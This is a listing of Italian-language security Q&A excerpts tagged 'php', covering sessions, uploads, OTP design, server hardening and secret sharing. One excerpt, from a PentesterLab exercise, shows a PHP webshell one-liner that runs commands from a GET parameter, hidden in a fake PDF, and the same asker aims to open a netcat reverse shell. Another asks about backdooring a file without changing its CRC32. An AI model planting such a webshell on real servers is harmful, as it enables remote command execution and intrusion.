Domande con tag 'php'

domande con tag
1
risposta

Esiste un modo sicuro per condividere sessioni nello stesso server con sottodomini diversi?

Sto studiando un caso in cui ho un backend RESTful (basato su php) e un front-end PHP HTML + JS + ibrido in diversi sottodomini: backend.example.com <-- A RESTful API to provide some XHR requests. *.example.com <-- Any other domains o...
posta 30.10.2014 - 20:41
3
risposte

Rischio di sicurezza derivante dai dati trasmessi in $ _GET superglobal

Questa è una domanda breve ma generale. Sono relativamente nuovo alla programmazione in generale. Il mio sito, che è scritto prevalentemente in PHP, sarà lanciato presto e sta subendo alcune restrizioni sulla sicurezza. Ciò è iniziato con la con...
posta 28.07.2014 - 21:16
1
risposta

convalida cURL cert con curlopt_cainfo non funzionante

Voglio convalidare il mio certificato SSL ogni volta che eseguo chiamate API. Ho seguito questa guida: link Questo è il mio codice: $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://api-3t.sandbox.paypal.com/nvp"); curl_setopt...
posta 10.06.2014 - 04:21
2
risposte

Ci sono dei difetti nella mia progettazione per una griglia OTP basata su carta?

Sto cercando di implementare l'autenticazione a due fattori a basso costo per un mio sito web. La mia banca utilizza questo tipo di sistema OTP basato su griglia, quindi ho voluto emularlo nella mia applicazione: Lecartevengonogenerateutilizz...
posta 09.08.2014 - 21:23
3
risposte

File di caricamento sicuro

Ho un sistema caricato file nel mio progetto php. Che cosa faccio al caricamento: 1) Controlla l'estensione del file e il tipo di file mime. 2) Se i tipi di estensione e mime sono consentiti, salvo il file fuori dalla directory public_h...
posta 04.02.2014 - 20:11
2
risposte

Client VPN: livello di sicurezza aggiuntivo o funzione inutile

Possiedo un portale Web aziendale che viene utilizzato per la collaborazione dello staff, tra cui un'interfaccia di posta basata sul Web, collegata al database MySQL, al calendario aziendale, all'archiviazione di file, ai dati dei contatti dei c...
posta 18.02.2014 - 11:51
1
risposta

Impossibile connettersi alla shell inversa di netcat

Sto facendo un esercizio di PentesterLab, ho una webshell chiamata 1.pdf e può essere inclusa in index.php come file PHP. Contiene codice come questo: %PDF-1.4 <?php echo system($_GET["cmd"]); ?> Ora voglio creare una shell inversa us...
posta 09.04.2014 - 08:39
4
risposte

A cosa serve concentrarsi quando si indurisce uno stack LAMP? [chiuso]

Ho un sito in esecuzione su un VPS. Ho impostato personalmente lo stack LAMP e alcuni altri programmi. Questa è solo la seconda volta che ho creato un VPS e sono un po 'preoccupato per la sicurezza. Ci sono cose di cui dovrei essere a conoscenza...
posta 20.03.2014 - 14:36
2
risposte

Come implementare l'algoritmo di condivisione segreta di shamir usando AES_ENCYRPT

Sto usando MySQL AES_ENCRYTP() e AES_DECRYPT() per memorizzare dettagli sensibili in un database e attualmente memorizzando la chiave in un file php all'esterno della web root con accesso in sola lettura. Il file chiave ha il se...
posta 12.06.2013 - 02:31
1
risposta

E 'possibile aggiungere backdoor a un file con le stesse dimensioni e il checksum crc32 (4 byte)?

È possibile aggiungere una backdoor a un file con le stesse dimensioni e il checksum crc32 (4 byte)? (Il file non contiene codice byte, contiene codice del programma come testo.La lingua è PHP.)     
posta 11.05.2014 - 15:28